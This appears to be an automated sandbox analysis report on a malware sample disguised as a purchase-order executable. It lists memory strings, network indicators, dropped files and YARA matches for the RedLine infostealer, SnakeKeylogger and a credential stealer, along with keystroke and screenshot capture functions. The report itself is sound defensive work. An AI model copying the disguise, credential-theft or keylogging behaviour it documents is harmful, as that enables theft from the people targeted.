                          Source: officesvcmgr.exe.11.drString found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
                          Source: alg.exe, 0000000B.00000003.2136814355.00000000015D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                          Source: alg.exe, 0000000B.00000003.2140176531.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2139918284.00000000015D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                          Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: alg.exe, 0000000B.00000003.2654268087.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                          Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810321677.00000000014B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: setup.exe0.11.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                          Source: setup.exe0.11.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                          Source: powershell.exe, 00000016.00000002.1815132146.000000000591A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                          Source: alg.exe, 0000000B.00000003.2653939958.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                          Source: officesvcmgr.exe.11.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
                          Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: officesvcmgr.exe.11.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
                          Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810321677.00000000014B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                          Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                          Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800763144.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378250354.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379239064.0000000001780000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800787635.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374357802.00000000007F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: Microsofts.exe.8.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                          Source: Microsofts.exe.8.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode
                          Source: officesvcmgr.exe.11.drBinary or memory string: RegisterRawInputDevicesmemstr_cb3ae7d6-1

                          System Summary

                          barindex
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 10.2.zeXKjViL.exe.41ea2c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 10.2.zeXKjViL.exe.40802a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 10.2.zeXKjViL.exe.40802a8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, CustomerQueueForm.csLarge array initialization: : array initializer size 1365018
                          Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.17.dr 665670656Jump to dropped file
                          Source: initial sampleStatic PE information: Filename: PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 0_2_0596BFD00_2_0596BFD0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 0_2_05961D880_2_05961D88
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 0_2_0596DB900_2_0596DB90
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 0_2_07AC00400_2_07AC0040
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00408C608_2_00408C60
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040DC118_2_0040DC11
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00407C3F8_2_00407C3F
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00418CCC8_2_00418CCC
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00406CA08_2_00406CA0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004028B08_2_004028B0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0041A4BE8_2_0041A4BE
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00408C608_2_00408C60
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004182448_2_00418244
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004016508_2_00401650
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00402F208_2_00402F20
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004193C48_2_004193C4
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004187888_2_00418788
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00402F898_2_00402F89
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00402B908_2_00402B90
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004073A08_2_004073A0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD7B718_2_02BD7B71
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C100D98_2_02C100D9
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C059808_2_02C05980
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD51EE8_2_02BD51EE
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD6EAF8_2_02BD6EAF
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C139A38_2_02C139A3
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C0C7F08_2_02C0C7F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD7F808_2_02BD7F80
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C037808_2_02C03780
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C0D5808_2_02C0D580
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_036A10208_2_036A1020
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_036A10308_2_036A1030
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_0558C45010_2_0558C450
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_0558C44010_2_0558C440
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_05580F6410_2_05580F64
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_05582ED810_2_05582ED8
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_05582EC810_2_05582EC8
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_076BBFD010_2_076BBFD0
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_076B4AAE10_2_076B4AAE
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_076B1D8810_2_076B1D88
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_076BDB9010_2_076BDB90
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 10_2_0943004010_2_09430040
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B3A81015_2_00B3A810
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B17C0015_2_00B17C00
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B179F015_2_00B179F0
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B42D4015_2_00B42D40
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B3EEB015_2_00B3EEB0
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B392A015_2_00B392A0
                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B393B015_2_00B393B0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245C16819_2_0245C168
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245CA5819_2_0245CA58
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_024519B819_2_024519B8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_02457E6819_2_02457E68
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_02454F0819_2_02454F08
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_02452DD119_2_02452DD1
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245CAAE19_2_0245CAAE
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245B9DC19_2_0245B9DC
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245B9E019_2_0245B9E0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_02457E6619_2_02457E66
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_02454EF819_2_02454EF8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B91C5819_2_04B91C58
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9ED8019_2_04B9ED80
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B915F819_2_04B915F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9450019_2_04B94500
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9777019_2_04B97770
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9699819_2_04B96998
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9049819_2_04B90498
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B99C9019_2_04B99C90
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9048A19_2_04B9048A
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9BC8019_2_04B9BC80
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E4D019_2_04B9E4D0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E4C019_2_04B9E4C0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9DC2019_2_04B9DC20
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9DC1119_2_04B9DC11
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9BC7119_2_04B9BC71
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B93C5019_2_04B93C50
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B93C4219_2_04B93C42
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B915EA19_2_04B915EA
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9CDE019_2_04B9CDE0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9CDD019_2_04B9CDD0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B90D3A19_2_04B90D3A
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C53019_2_04B9C530
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C52019_2_04B9C520
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9ED7019_2_04B9ED70
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B90D4819_2_04B90D48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9A6B919_2_04B9A6B9
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9D69019_2_04B9D690
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9D68119_2_04B9D681
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9A6C819_2_04B9A6C8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9F63019_2_04B9F630
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9F62019_2_04B9F620
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B99E1819_2_04B99E18
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B937F819_2_04B937F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B937E819_2_04B937E8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B92F3819_2_04B92F38
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9AF7819_2_04B9AF78
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9AF6819_2_04B9AF68
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B92F4819_2_04B92F48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B940A819_2_04B940A8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9409819_2_04B94098
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B908F019_2_04B908F0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C0D819_2_04B9C0D8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B908DF19_2_04B908DF
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C0CA19_2_04B9C0CA
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9B82819_2_04B9B828
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9B81819_2_04B9B818
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9000619_2_04B90006
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E07819_2_04B9E078
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E06819_2_04B9E068
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9004019_2_04B90040
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B911A019_2_04B911A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C98819_2_04B9C988
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9118F19_2_04B9118F
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9F1D819_2_04B9F1D8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9F1C819_2_04B9F1C8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E92819_2_04B9E928
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9E92219_2_04B9E922
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9C97A19_2_04B9C97A
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9FA8819_2_04B9FA88
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B92AF019_2_04B92AF0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B92AE019_2_04B92AE0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9D23819_2_04B9D238
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9D22A19_2_04B9D22A
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9FA7819_2_04B9FA78
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9A27019_2_04B9A270
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9A26119_2_04B9A261
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B933A019_2_04B933A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9339119_2_04B93391
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9B3D019_2_04B9B3D0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9B3C119_2_04B9B3C1
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9AB2019_2_04B9AB20
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B9AB1019_2_04B9AB10
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_04B91B4A19_2_04B91B4A
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00C97C0020_2_00C97C00
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00CBA81020_2_00CBA810
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00C979F020_2_00C979F0
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00CC2D4020_2_00CC2D40
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00CB92A020_2_00CB92A0
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00CBEEB020_2_00CBEEB0
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00CB93B020_2_00CB93B0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04F2B49022_2_04F2B490
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04F2B47022_2_04F2B470
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_08F63E9822_2_08F63E98
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_00897C0026_2_00897C00
